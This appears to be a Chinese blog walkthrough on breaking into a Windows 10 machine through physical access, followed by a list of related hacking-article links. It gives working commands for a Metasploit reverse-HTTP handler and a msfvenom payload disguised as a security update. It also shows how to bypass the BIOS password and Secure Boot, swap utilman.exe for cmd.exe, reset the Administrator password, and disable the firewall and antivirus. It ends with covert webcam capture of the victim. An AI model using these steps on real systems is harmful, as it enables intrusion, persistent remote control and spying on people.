实战:入侵win10
简介
网上看到有人发布的关于win10的入侵流程,正好手上有两台电脑,大致说一下我的思路吧
原理
原理其实都是差不多的,即想办法把你的后门植入系统,然后远程控制。随着win10越来越安全,如果对方防备完善的话,
防火墙全开,远程端口默认禁止,附带杀毒软件,那么很难不通过物理接触感染系统。这里的思路利用win10的secure boot
提权然后拿到Administrator帐号进行入侵
步骤
简要分为以下几个步骤:
1.制作2块USB
2.物理接触主机,获得Admin权限
3.进入系统植入后门
4.入侵完成,拔出USB溜之大吉
5.远程控制,享受入侵的福利
准备
两台电脑,一台Linux,一台win10, Linux是攻击者,win10是靶机
这里不建议直接用入侵电脑控制靶机,因为会暴露目标。推荐Ali或者Amazon,GCP去租一台免费云服务器,如果
是Amazon的话学生每年有100$的免费配额可以使用,用EDU邮箱注册即可
SSH连到云服务器,安装MSF:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
sudo chmod 755 msfinstall
sudo ./msfinstall
安装screen:
sudo apt-get install screen
生成一个脚本文件:
touch automate.rc
sudo nano automate.rc
输入以下内容:
use multi/handler
set payload windows/meterpreter/reverse_http
set LHOST *你的IP*
set LPORT 4444
set ExitOnSession false
set EnableStageEncoding true
exploit -j
然后ctrl + x退出,y保存
这里把TCP数据包传输到异常端口(4444,5555)来躲避DPI(deep packet inspection) (注:这里面对win10最新版本是没有用的,实际还需要手动关闭防火墙和网络端口保护)
打开MSF:
sudo msfconsole
然后就看到经典的logo了,输入以下代码生成payload:
msfvenom --encoder cmd/powershell_base64 --payload windows/meterpreter/reverse_http LHOST=*你的IP* LPORT=4444 --arch x86 --platform win --format exe --out ~/'Windows Security Update.exe'
这个payload会以正常安全更新的exe伪装,从而达到规避用户注意的效果
把这个exe文件用ftp拉到本地,然后拷到USB1 上
去MS官网下载windows installation media,然后烧录到USB2 上
攻击
月黑风高之夜,你披着一件纯黑的夜行衣,在利用社会工程学后成功来到了机房。面对满眼的机器,你既没有用户账户也没有密码。你接近一台主机,重启后狂按F12切到BIOS设置页面,发现需要输入密码才能解锁BIOS…
你不慌不忙,很快打开https://bios-pw.org/, 然后输入机器序列号,这就解锁了,于是你把secure boot关掉,保存设置后关机
插上USB2,启动按F12选择USB boot,然后顺理成章的进入了系统安装界面(蓝色屏幕),这时候不要继续:
shift + F10
调出CMD,发现是X:,于是:
cd C:
cd windows\system32
dir
确认有一个文件叫做utilman.exe,这个文件本来是可以在开机登录界面用的,用来调节亮度等信息,普通用户也可以接触
输入:
mv utilman.exe utilman.exe.bak
cp cmd.exe utilman.exe
覆盖掉原文件,原来的utilman文件备份起来
重新正常启动,然后进入win10登录页面,点击右下角的ease of access,奇迹出现了,弹出一个cmd对话框,而且还是管理员权限的
输入:
net user administrator *password*
注意替换password,就重设了默认管理员的密码,登进去
插入USB1,把Windows Security Update.exe放到start menu/program下
关闭防火墙和杀毒软件,关闭网络和端口保护
然后把utilman复原:
打开管理员cmd
mv utilman.exe.bak utilman.exe
关机,拔出USB溜之大吉
入侵后
主机已经成功被你入侵,ssh连到云服务器,然后输入:
sudo screen msfconsole -r ~/automate.rc
进行监听
假设对方完全不知道自己被入侵,于是打开电脑,这时候云服务器输入:
sessions
可以看到有一个对应的Id以及对应的IPV4地址
输入:
sessions -i 1
选择第一个目标
然后就可以拿到shell了
webcam_list
会列出摄像头列表
webcam_snap -i 1 -v false
用第一个摄像头拍照,照片就存储在云服务器上
实战:入侵win10相关推荐
- 实战入侵校园实验平台
目标机:172.18.206.87(学校内网) 网址:www.manage.vslab- 9.26号和老师谈论了仿真实验网站的安全性,经过老师的允许,我开始有了寻找漏洞的想法. 寻寻觅觅,一时间来到了 ...
- 北风网--网络安全系列课程之网络攻防全面实战(涉及加密、解密)
讲师简单介绍:讲师龙飞为北风网网络安全领域讲师,讲师曾经先后在国内各大网站,如黑鹰.甲壳虫之类的黑客网站从事网络安全教育!本系列课程由龙飞讲师主讲,共60课时,全面讲述网络安全方面各大知识,是一个不错 ...
- 2010最新黑客VIP入侵教程大集合 脚本入侵动画 网站入侵 批量135抓肉鸡
第一课脚本入侵动画:实验环境之虚拟机的搭建 教程下载地址:http://vip.hack95.com/jhk/xuniji.rar 第二课脚本入侵动画:个人电脑优化配置推荐方案(上) 教程下载地址:h ...
- 木马的攻击与防御(MSF)
MSF简介 Metasploit是一个免费的.可下载的框架, 通过它可以很容易地 获取.开发并对计算机软件漏洞实施攻击.它本身附带数百个已知软件漏洞的专业级漏洞攻击工具.它集成了以下4个模块: exp ...
- kali扫描内网ip_来,我们聊聊内网渗透!
文章来源:Admin Team 0x00 前言 前段时间再看 metasploit 和白帽子讲 Web 安全,就一直想自己搭个从 Web 端渗透进入内网的环境玩一下,不过因为不太懂计网的知识,拓扑图也 ...
- hacker vip教程
第123课]服务器安全配置与管理系列9-适合web服务器的权限设置 http://vipsoft1.hacker.com.cn/vip1-down/200610/2003quanxian.rar [第 ...
- 一些黑防的VIP教程,绝对可下,迅雷下载
一些黑防的VIP教程,绝对可下,迅雷下载 [第123课]服务器安全配置与管理系列9-适合web服务器的权限设置 http://vipsoft1.hacker.com.cn/vip1-down/2006 ...
- 永恒之蓝--Windows server 2008R2
通过ms17-010漏洞模块实战入侵win08R2主机 拓扑结构: windows server 2008 IP地址信息:100.69.250.93 kali linux IP地址信息:100.69. ...
- 黑客常用端口漏洞利用
文章目录 21端口渗透剖析 22端口渗透剖析 23端口渗透剖析 25/465端口渗透剖析 53端口渗透剖析 80端口渗透剖析 135端口渗透剖析 139/445端口渗透剖析 1433端口渗透剖析 15 ...
- win10环境socks代理实战
0x00 起因 由于更新了开发环境,我需要使用ssh登录多个主机,有一个虚拟化环境,上面存在一些虚拟化产品,需要登录管理界面. 0x01 调研 首先想到的是vpn技术,这里可以选择的比较多,我们可以使 ...
最新文章
- kset_register
- PHP根据时间戳返回星期几
- ai怎么画循环曲线_科研论文作图系列-从PPT到AI (三)
- python idle撤回上一条命令_找回Python IDLE Shell里的历史命令(用上下键翻历史命令怎么不好用了呢?)...
- JDBC之封装通用的BaseDao
- 如何使用java程序操作ActiveMQ
- 1.EXTJS Row Editor Grid 点取消时插入的新行 的解决方法
- MFC窗口颜色的设置
- 他山之石,可以攻玉——来自亚马逊的电商启示录
- 灼灼夏日 - 遥思故乡 - 赤子无相忘
- 神经网络不收敛的查缺补漏
- 半年成java大佬_通过自学60天成为java大佬 第一天 知识点总结 数据类型
- 脑电EEG代码开源分享 【2.预处理-静息态篇】
- arduino与74HC595驱动8位数码管(含代码)
- AppCan学习笔记
- 截图并使用libjpeg库压缩BMP为JPG与将JPG转换为BMP
- 中国金属包装容器制造行业竞争格局分析与投资规划深度研究报告2022-2028年版
- 从零基础到web前端工程师(三)
- Nginx 单IP绑定多域名配置 顶级域名重定向到www域名
- 【Vulnhub靶场】THOTH TECH: 1